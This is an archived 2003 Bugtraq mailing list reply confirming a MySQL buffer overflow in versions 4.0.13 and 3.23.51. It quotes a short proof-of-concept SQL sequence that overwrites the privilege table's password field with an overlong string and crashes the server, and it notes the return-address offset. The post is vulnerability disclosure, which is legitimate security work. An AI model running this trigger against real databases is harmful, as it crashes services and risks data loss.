lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200309111341.29638.ktsolov@etel.bg>
Date: Thu, 11 Sep 2003 13:41:29 +0300
From: Konstantin Tsolov <ktsolov@...l.bg>
To: bugtraq@...urityfocus.com
Subject: Re: Buffer overflow in MySQL



managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.

3.23.51 (the distro mysql version) also proved vulnerable.

nb: just make sure you have a backup copy of your mysql db when testing this
harmless proof of concept on your production server :-)

> successful exploitation of that bug is trivial on some platforms. On most
> Linux systems the return address needs about 444 bytes to get overwritten.
>
>   Harmless proof of concept :
>   > USE mysql;
>   > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
>   > UPDATE User SET Password =
>
> '123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  12345678123456781234567812345678...' WHERE User = 'abcd';
>
>   > FLUSH PRIVILEGES;
>
>   [Connection lost]

-- 

"Talk is cheap because supply always exceeds demand."
		-- source unknown

+------------------------------------------------------+
| Konstantin Tsolov             ktsolov at etel dot bg |
| Systems Administrator - VoIP                         |
| eTel Ltd.                                www.etel.bg |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ